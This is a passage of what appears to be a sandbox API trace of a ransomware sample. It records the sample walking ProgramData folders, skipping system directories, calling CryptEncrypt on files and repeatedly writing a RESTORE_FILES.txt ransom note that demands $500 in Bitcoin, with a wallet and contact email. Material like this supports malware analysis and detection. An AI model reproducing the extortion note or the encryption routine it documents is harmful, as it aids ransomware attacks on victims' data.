secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.578] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0065.579] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.579] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0065.579] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.579] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0065.579] CloseHandle (hObject=0xb4) returned 1 [0065.579] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0065.582] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0065.582] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RESTORE_FILES.txt") returned 53 [0065.582] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0065.922] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.922] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0065.923] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.923] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0065.924] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.924] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0065.924] CloseHandle (hObject=0xa4) returned 1 [0065.924] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0065.924] lstrcmpiW (lpString1="Device Stage", lpString2="Windows") returned -1 [0065.924] lstrcmpiW (lpString1="Device Stage", lpString2="Program Files") returned -1 [0065.924] lstrcmpiW (lpString1="Device Stage", lpString2="Program Files (x86)") returned -1 [0065.924] lstrcmpiW (lpString1="Device Stage", lpString2="$Recycle.bin") returned 1 [0065.924] lstrcmpiW (lpString1="Device Stage", lpString2="System Volume Information") returned -1 [0065.924] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage") returned 41 [0065.924] lstrcmpW (lpString1="Device Stage", lpString2=".") returned 1 [0065.924] lstrcmpW (lpString1="Device Stage", lpString2="..") returned 1 [0065.924] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*") returned 43 [0065.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0065.925] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.925] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.925] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.925] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.925] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.925] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\.") returned 43 [0065.925] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.925] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.925] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.925] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.925] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.925] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.925] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.925] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\..") returned 44 [0065.925] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.925] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.925] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.925] lstrcmpiW (lpString1="Device", lpString2="Windows") returned -1 [0065.925] lstrcmpiW (lpString1="Device", lpString2="Program Files") returned -1 [0065.925] lstrcmpiW (lpString1="Device", lpString2="Program Files (x86)") returned -1 [0065.925] lstrcmpiW (lpString1="Device", lpString2="$Recycle.bin") returned 1 [0065.925] lstrcmpiW (lpString1="Device", lpString2="System Volume Information") returned -1 [0065.925] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device") returned 48 [0065.925] lstrcmpW (lpString1="Device", lpString2=".") returned 1 [0065.925] lstrcmpW (lpString1="Device", lpString2="..") returned 1 [0065.925] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*") returned 50 [0065.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0065.927] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.927] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.927] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.927] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.927] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.927] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\.") returned 50 [0065.927] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.927] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.927] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.927] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.927] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.927] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.927] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.927] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\..") returned 51 [0065.927] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.928] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.928] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.928] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Windows") returned -1 [0065.928] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Program Files") returned -1 [0065.928] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Program Files (x86)") returned -1 [0065.928] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="$Recycle.bin") returned 1 [0065.928] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="System Volume Information") returned -1 [0065.928] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 87 [0065.928] lstrcmpW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2=".") returned 1 [0065.928] lstrcmpW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="..") returned 1 [0065.928] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*") returned 89 [0065.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0065.938] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.938] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.938] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.938] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.938] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.938] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\.") returned 89 [0065.938] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.938] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.938] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.938] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.938] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.938] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.938] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.938] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\..") returned 90 [0065.938] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.938] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.938] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.938] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0065.939] lstrcmpiW (lpString1="background.png", lpString2="Program Files") returned -1 [0065.939] lstrcmpiW (lpString1="background.png", lpString2="Program Files (x86)") returned -1 [0065.939] lstrcmpiW (lpString1="background.png", lpString2="$Recycle.bin") returned 1 [0065.939] lstrcmpiW (lpString1="background.png", lpString2="System Volume Information") returned -1 [0065.939] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 102 [0065.939] StrStrIW (lpFirst="background.png", lpSrch=".protected") returned 0x0 [0065.939] lstrcmpW (lpString1="background.png", lpString2="RESTORE_FILES.txt") returned -1 [0065.939] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.939] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.939] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.939] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.939] lstrcmpiW (lpString1="behavior.xml", lpString2="Windows") returned -1 [0065.939] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files") returned -1 [0065.939] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files (x86)") returned -1 [0065.939] lstrcmpiW (lpString1="behavior.xml", lpString2="$Recycle.bin") returned 1 [0065.939] lstrcmpiW (lpString1="behavior.xml", lpString2="System Volume Information") returned -1 [0065.939] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 100 [0065.939] StrStrIW (lpFirst="behavior.xml", lpSrch=".protected") returned 0x0 [0065.939] lstrcmpW (lpString1="behavior.xml", lpString2="RESTORE_FILES.txt") returned -1 [0065.939] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.940] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.940] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.941] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.941] lstrcmpiW (lpString1="device.png", lpString2="Windows") returned -1 [0065.941] lstrcmpiW (lpString1="device.png", lpString2="Program Files") returned -1 [0065.941] lstrcmpiW (lpString1="device.png", lpString2="Program Files (x86)") returned -1 [0065.941] lstrcmpiW (lpString1="device.png", lpString2="$Recycle.bin") returned 1 [0065.941] lstrcmpiW (lpString1="device.png", lpString2="System Volume Information") returned -1 [0065.941] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 98 [0065.941] StrStrIW (lpFirst="device.png", lpSrch=".protected") returned 0x0 [0065.941] lstrcmpW (lpString1="device.png", lpString2="RESTORE_FILES.txt") returned -1 [0065.941] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.941] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.941] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.942] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.942] lstrcmpiW (lpString1="overlay.png", lpString2="Windows") returned -1 [0065.942] lstrcmpiW (lpString1="overlay.png", lpString2="Program Files") returned -1 [0065.942] lstrcmpiW (lpString1="overlay.png", lpString2="Program Files (x86)") returned -1 [0065.942] lstrcmpiW (lpString1="overlay.png", lpString2="$Recycle.bin") returned 1 [0065.942] lstrcmpiW (lpString1="overlay.png", lpString2="System Volume Information") returned -1 [0065.942] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 99 [0065.942] StrStrIW (lpFirst="overlay.png", lpSrch=".protected") returned 0x0 [0065.942] lstrcmpW (lpString1="overlay.png", lpString2="RESTORE_FILES.txt") returned -1 [0065.942] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.942] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.942] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.942] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.942] lstrcmpiW (lpString1="superbar.png", lpString2="Windows") returned -1 [0065.942] lstrcmpiW (lpString1="superbar.png", lpString2="Program Files") returned 1 [0065.942] lstrcmpiW (lpString1="superbar.png", lpString2="Program Files (x86)") returned 1 [0065.942] lstrcmpiW (lpString1="superbar.png", lpString2="$Recycle.bin") returned 1 [0065.942] lstrcmpiW (lpString1="superbar.png", lpString2="System Volume Information") returned -1 [0065.942] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 100 [0065.942] StrStrIW (lpFirst="superbar.png", lpSrch=".protected") returned 0x0 [0065.942] lstrcmpW (lpString1="superbar.png", lpString2="RESTORE_FILES.txt") returned 1 [0065.942] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.942] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.942] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.943] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0065.943] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0065.944] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\RESTORE_FILES.txt") returned 105 [0065.944] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0065.947] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.947] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0065.948] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.948] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: 